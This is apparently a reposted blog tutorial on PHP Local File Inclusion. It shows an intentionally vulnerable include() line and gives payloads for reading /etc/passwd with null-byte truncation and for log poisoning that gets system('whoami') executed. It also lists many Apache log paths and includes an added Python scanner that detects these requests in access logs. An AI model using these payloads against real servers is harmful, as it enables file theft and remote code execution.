  • Local File Inclusion (LFI) Vulnerability Exploitation

    Code:

    <?php
    include($_GET['for'].'.php'); // used to test the local file inclusion vulnerability
    ?>
    

    Linux

    test.php?for=/etc/passwd%00
    

     

    Win

    test.php?for=D:\readme.txt%00

    Log Injection

    Request any page with the payload in the URL so that the payload is written to the log, then include the log file to execute the payload.

    test.php?<?php%20system('whoami');?>
    

    Then include the log file:

    //linux
    test.php?for=/var/log/apache/logs/access_log%00
    //win
    test.php?for=..\apache\logs\access.log%00
    

    Possible log paths

    /etc/httpd/logs/access.log
    /etc/httpd/logs/access_log
    /etc/httpd/logs/error.log
    /etc/httpd/logs/error_log
    /opt/lampp/logs/access_log
    /opt/lampp/logs/error_log
    /usr/local/apache/log
    /usr/local/apache/logs
    /usr/local/apache/logs/access.log
    /usr/local/apache/logs/access_log
    /usr/local/apache/logs/error.log
    /usr/local/apache/logs/error_log
    /usr/local/etc/httpd/logs/access_log
    /usr/local/etc/httpd/logs/error_log
    /usr/local/www/logs/thttpd_log
    /var/apache/logs/access_log
    /var/apache/logs/error_log
    /var/log/apache/access.log
    /var/log/apache/error.log
    /var/log/apache-ssl/access.log
    /var/log/apache-ssl/error.log
    /var/log/httpd/access_log
    /var/log/httpd/error_log
    /var/log/httpsd/ssl.access_log
    /var/log/httpsd/ssl_log
    /var/log/thttpd_log
    /var/www/log/access_log
    /var/www/log/error_log
    /var/www/logs/access.log
    /var/www/logs/access_log
    /var/www/logs/error.log
    /var/www/logs/error_log
    C:\apache\logs\access.log
    C:\apache\logs\error.log
    C:\Program Files\Apache Group\Apache\logs\access.log
    C:\Program Files\Apache Group\Apache\logs\error.log
    C:\program files\wamp\apache2\logs
    C:\wamp\apache2\logs
    C:\wamp\logs
    C:\xampp\apache\logs\access.log
    C:\xampp\apache\logs\error.log
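
    The requests above leave recognizable traces in the web server's own access log. The following is an added example, not part of the original post: it parses Apache access log lines and flags the patterns this page shows (a PHP tag written into a logged field, and a null byte, traversal, absolute path or log file name in the include parameter). The log lines are constructed samples, and the rule names and the `INCLUDE_PARAMS` set are assumptions of this example; only the parameter name `for` comes from the test script above.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache combined log format; referer and user-agent are optional (common format).
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(.*?)" (\d{3}) \S+(?: "(.*?)" "(.*?)")?$')
PHP_TAG = re.compile(r'<\?(?:php|=)', re.I)        # PHP open tag written into a logged field
TRAVERSAL = re.compile(r'\.\.[\\/]')               # ../ or ..\
ABSOLUTE = re.compile(r'^(?:/|[A-Za-z]:)')         # /etc/... or D:...
LOG_NAME = re.compile(r'(?:access|error)[._]log|thttpd_log|ssl_log', re.I)
INCLUDE_PARAMS = {"for"}  # parameter that reaches include() in the page's test.php

def findings(line):
    """Return (client, status, sorted reasons) for a suspicious line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, request, status, referer, agent = m.groups()
    reasons = set()
    # Log poisoning: a PHP tag in any client-controlled field that ends up in the log.
    if any(PHP_TAG.search(unquote(f or "")) for f in (request, referer, agent)):
        reasons.add("php-tag-in-log")
    parts = request.split(" ")
    target = " ".join(parts[1:-1]) if len(parts) >= 3 else request
    for name, value in parse_qsl(target.partition("?")[2], keep_blank_values=True):
        if name not in INCLUDE_PARAMS:
            continue
        if "\x00" in value:
            reasons.add("null-byte")
        if TRAVERSAL.search(value):
            reasons.add("path-traversal")
        if ABSOLUTE.match(value):
            reasons.add("absolute-path")
        if LOG_NAME.search(value):
            reasons.add("log-file-as-include-target")
    return (client, int(status), sorted(reasons)) if reasons else None

def scan(lines):
    return [hit for hit in map(findings, lines) if hit]

# Constructed sample lines (documentation IP addresses), not real traffic.
SAMPLE_LOG = '''
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /test.php?for=news HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.66 - - [01/Jan/2024:10:00:05 +0000] "GET /test.php?for=/etc/passwd%00 HTTP/1.1" 200 1843 "-" "curl/8.0"
192.0.2.66 - - [01/Jan/2024:10:00:09 +0000] "GET /test.php?<?php%20system('whoami');?> HTTP/1.1" 200 512 "-" "curl/8.0"
192.0.2.66 - - [01/Jan/2024:10:00:12 +0000] "GET /test.php?for=..%5Capache%5Clogs%5Caccess.log%00 HTTP/1.1" 200 9000 "-" "curl/8.0"
'''.strip().splitlines()

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

    PHP 5.3.4 and later reject paths that contain a NUL byte, so the `%00` truncation only succeeds on older interpreters; the `null-byte` finding is still worth alerting on because it shows the attempt.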
    

     

    Reference: http://downloads.ackack.net/LocalFileInclusion.pdf

  • Original article: https://www.cnblogs.com/ls-pankong/p/10492916.html